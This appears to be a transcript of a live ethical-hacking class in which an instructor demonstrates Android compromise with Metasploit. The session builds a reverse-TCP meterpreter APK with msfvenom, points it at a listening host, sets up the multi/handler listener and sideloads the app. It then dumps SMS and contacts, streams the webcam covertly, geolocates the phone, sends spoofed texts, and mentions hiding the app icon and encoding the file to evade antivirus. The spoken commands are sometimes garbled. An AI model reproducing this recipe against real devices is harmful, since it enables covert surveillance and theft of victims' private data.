Okay, so this is the interface of Metasploit framework of MSF console. So these are the exploits available in this framework: 2167 exploits and 592 payloads available. Okay, if you want to see, just type show payloads and enter. So it is a list of available payloads for different operating system or different kinds of vulnerability has any system. So these payloads are used for finding the different kinds of vulnerabilities in that operating system. So there are a number of payloads available. You can use it according to find any vulnerabilities in the system. Okay. So in Android hacking, we use Metapreter or reverse TCP kind of payload. Okay. And if you want to see, show, clear these things. If you want to show exploits, so this is the list of exploits available with this tool. Okay, so these are the strength, how it's work, excellent, great. Okay, so first of all, you have to find the vulnerabilities on particular operating system or in particular services. Then you have to exploit that network, or you can say operating system, or you can say the service. Okay, by using that exploits available. Okay, so Android hacks, we will discuss on two things. First, we will hack Android device, any Android device. Okay, and then spotlight on routing, and what is the pros and cons of routing. Okay, and what is routing. So hacking a Android device. Okay, first of all, you have to create a file with a backdoor in it. Okay, because if you want to take access from any device, okay, so okay, for Android, we are going to create an APK file with a backdoor in it. Okay, uh, because if you want to take access of any device, it is required to make a backdoor with that file, because that backdoor opens and you can exploit that Android phone easily. Okay, so backdoor is a method or a way by passing authentication in the product, computer, etc., etc. They are usually used for unauthorized access to a computer. Okay, so why we use a backdoor? Because first of all, what is a backdoor? So as its name suggests, backdoor means it is the entry by, not the main gate. It is kind of entry by a backdoor. Okay, so you can say it is just like if a hacker takes a long time to perform a Android attack or any kind of attack. Okay, suppose a hacker hacks a Windows 10 machine or Windows 10 server by doing 10 days practice. Okay, Okay, so backdoor. So what is the importance of backdoor in it? So in that case, backdoor क्या करेगा? A hacker should make a backdoor. ओके, बिकॉज वो फिर से वो 15 दिन का टाइम नहीं लगाना चाहेगा उस सर्विस को हैक करने में. सो वो क्या करेगा कि वो उस ऑपरेटिंग सिस्टम में आइडेंटिफाइड वल्नरेबिलिटीज़ का यूज़ करके एक बैकडोर हाइड करेगा, बिकॉज that backdoors help the hacker to make the connection in the future purpose. Okay, so we can say backdoor is a process by which a hacker can hack your compromised machine in future easily. Okay, he will not do that kind of efforts again and again. He just call that service in which backdoor is hidden. He just call the backdoor method and he makes connection with that system easily. So backdoor is a method or a way of bypassing authentication. Okay, so that's why first of all we have create a payload in the form of APK, and then we uh, exploit it, and our Android phone is completely compromised. Okay, hacking Android device. So this is the commands we used. Okay, so MSF Venom. Sorry. So this is the command we use, MSF Venom. So is a small framework of Metasploit services. We use it to perform this kind of Android hack attack. Okay, so we need few things for that practical. Okay, we need Android device. Okay, and a valid internet connection, and a Kali Linux machine installed in our virtual machine or in our main system. Okay, so let's do it on our Kali Linux machine. First of all, what is MSF Venom? So you can just type here MSF Venom -L payloads. Okay, so it will, yes sir.
Metasploit framework, it is available with Kali Linux, but can we install this Metasploit framework on any platform on Linux?
Yes, you can install it for any platform, because you can download it from GitHub or any other kind of website, and you can use it easily
Whether
on
it's
any
Ubuntu,
platform.
Fedora?
Yes, sir.
Okay, okay, thanks.
Okay. So there are 592 payloads available on this MSF Venom. Now, if you type MSF Venom hyphen help, so this shows how to use this MSF Venom command. So if you want to make a payload, just use -p. If you want to use any kind of other format, just type F, E for encoder, etc., etc. Okay. So first of all, just clear all these things, and check our local IP address, because we are doing this in our local network. Okay. One 0127. Okay, so just type MSF Venom hyphen P for payload. Okay, creating for Android. So just type Android interpreter kind of payload. Reverse TCP. So this is the payload we have used. MSF Venom hyphen P Android Metapreter reverse TCP. This is also in the list of Metasploit. Okay, so just type your local host here, lhost. So 192.168.0.127 here. Type L port. You can use any free port to listen. Okay, so you can use 444 or 8484. Okay, now so just copy this command and doing this is on next. Paste here. Name of file, suppose test dot. So so our payload is created. It is very small in size. Okay, and you can see this is our payload. this is test.apk, and this is the apk file which you have to install on any Android phone which you have to compromise. Okay, so now what are the next thing? So first of all, just clear and type msf console. You have to start the Metasploit framework. Okay. Now type use exploit, which is multi handler, and type. Okay. So we have used multi handler kind of exploit. Okay. Now you have to set the exploit set payload for Android. You have to just type AND and press tab, and meter operator reverse TCP and hit enter. Okay, that is fine, that is working. Set lhost. So here you have to type the same local host address which you have typed in the payload, otherwise it is not working. Okay, set L port here. So I have mentioned there 4444. Okay. So this is the process. Now our main task is that install the APK file in any smartphone. So you can send it by any method which you have learned in your social engineering series. So I have used my smartphone directly plugged in here. So just click on USB and Samsung. Just copy it. Okay. No. Okay. So there is a problem with this phone. So I used another phone here. 1 minute. So now I plugged in my personal phone. So you can see this is the phone. Okay. Now just go to my Kali Linux machine. I don't know why it is showing this message. So do one thing. Okay, it's also not working, so I use here a browser. Smash file transfer. So I upload the test.apk here, and or I can make simple link here. I don't know why it is not downloaded. Okay, my phone is not connected here properly. So, and this file, basically, this is the file, is APK file, and I send it over the web. That's why it shows that this is a Trojan. So it is not downloaded in phone also. So I just use another phone. Just open. Okay, so give me 1 minute. I will arrange another phone. So everything is ready, but we are facing problem to install that APK in the phone. Okay, so
So is there any antivirus that is actually interfering or any device?
no, no, no. But there is a problem in Samsung phone uh, with Kali Linux. So if I just click to access, it's not showing the file type. Otherwise, I directly copy that APK file into the file system of phone.
What is the media file to your laptop using?
Okay. So for doing, so just connect a pen drive. Copy. Just copy and okay. So so this is the screen of our phone, and this is our APK file. Yes. So install unknown sources. Next, install anyway. And open. Okay, done. Now on this site, type one more command, set exit on session false. Mean to say, if you are exit from this session, then it doesn't break your session. It's automatically recreate your session after breaking the connection with your victim's device. So just type here exploit and you can see one session is open. So this is the icon of your app main activity. You can hide this app from your list. Okay, it takes time to create the session. Once the session is confirmed, we are able to take total control of that Android device. It tries a lot to make the connection. Okay, so don't worry, I just press Control C here and and just copy this into another phone and okay, so this is my phone and now I'm installing this app in my phone. Okay, so these are the permission which this app has taken already: location, phone, SMS, microphone. These all the permission this app has already taken by your phone. So just press continue. Okay, and go to your Kali machine. Type this. We repeat those steps, and finally exploit. Don't waste too time on it. Just do one thing. Cut and type cd desktop msf console. So payload is ready, but we have to exploit that. So just type set use exploit multi handler. Okay, now set payload Android meter return reverse TCP set lhost 192.168.127 7 set port just exploit it. So here our session is made with our victim device. So this is my device. So just do one. Here you can do many things. Okay, session is died. Just type help. So you can do these kind of stuff on that phone. So just type dump SMS, copy. So today there are lots of problems in network, or we can say in operating system. That's why. Okay. So just type uh, dump SMS. So these are my SMS, and this is the text file, and this is my personal phone SMS. Okay, so you can read it. Okay, and now if you want to dump contacts, just type dump contacts, and all your contacts are saved into the text file. No issue. Just try one more time. Okay, and if you want to turn on camera, you just type webcam stream. Okay, so just copy, paste it over here. So no issue. You have to make the connection again. Okay, just type webcam stream, and now web camera is working. Okay, and you can do lots of things, but today there is a problem in the network, or I don't know, in the operating system. So These all our options are working properly. You can easily play a stream. Why it is died again and again. No, it's not work properly. Here you can type cd ls hyphen l. I want to show you how you can download the WhatsApp pictures, or you can download the data from your SD card or your phone card. But the session is not maintained properly. Okay, CD. So this operation is failed. Okay, but if you type the help, and also you can send the message, text message from that system. Just type send SMS, type send SMS, hyphen D for destination, and type. Okay, no, it's not working properly today. Tap your phone number 945. This is my own number, and hyphen T, and shit. So SMS transmission successful, and you can see on my screen, because this is my phone, and I am also received this message from my own number. You can see, hello. Okay, so these are the fake message by which you can send by any compromised phone. Okay. Or I just want to type webcam stream once again. It's working or not? No, it's not working. Otherwise, my web camera is open, and it will capture my video without without my permission, and I don't know what's my camera did. So this is the power of that tool. But with the time, this tool has updated and the security level of Android is updated. That's why it's not working properly in every manner. Now, if you just type help again, you can see there are geolocate. So if you type copy, paste it, so it will gives you the longitude and latitude of that phone. Okay, so you can easily knowing about the location of that phone. So if you are using that credential in Google Earth, you can easily know the. Just click on that, or just type that longitude or latitude into the Google Earth. Okay, so and if you really want to know what is this phone is, so just type here sysinfo. So this is Android 11 version. Okay, so even Android 11 is an updated uh, operating system. So it can also be compromised. So there are lots of options available. Okay, and you can do anything, but I'm not able to download CD. Oh man, it's not working. So it's not working properly, but I think you people have idea about the Android hacking, how you can hack the Android phone, and just do one thing, just virus total. And if you really upload that file to virus total, so you can see the result. So almost 24 out of 57 antiviruses tells it is a harmful file. It is a Metasploit, Trojan. Some says it is a Trojan and some says it is a Metasploit. Okay. And there are various techniques available how you can hide it from searching of virus total, so you can easily encode that file, but this is a long process. uh, if you add some encoder onto that apk file, your apk file is safe, and it doesn't showing that this is a metasploit or this is the trojan. So, but those are the lengthy process. But here I only make this test APK is for hacking or hacking any Android phone. That's why sorry. So no, it's not working. No, it's Not working. No. Okay. So that's it. So this is the demonstration of a Android hacking attack, how you can make a payload and how you can exploit it. Okay. And how you can take the access of that Android phone. You can easily dump the contact, you can easily dump the call record, even you can easily dump the SMS file also. And you can easily uh, control their cameras also. Okay, so this is the power of Metasploit. Okay, and if you really want to make this, just practice it, and then you want to know how it is dangerous for any Android device. Okay, so that's all from my side for session today, session 2. And now I will provide you a link for today's quiz. Okay, so I will provide that link in the chat box or in the WhatsApp group also. You can access that link from both of the places and give your test. Okay, so thank you and all the best for the quiz. About the logs, actually, I applied too many times CD. So here I am not able to change the directory. Okay, so if CD command works, I can see all the file available in that phone. So here CD command is not working in the particular session. That's why I can't see what's in the phone. Otherwise, it is very easy to download any image or any file from that phone. Okay, ये use ही नहीं किया था. So this is the problem for today, that there is a problem between maintaining a session between our Kali machine and our victim phone. So this is okay. So I am sending the SMS. I am sending the your quiz link into the chat box. So please uh, use that link and give your test.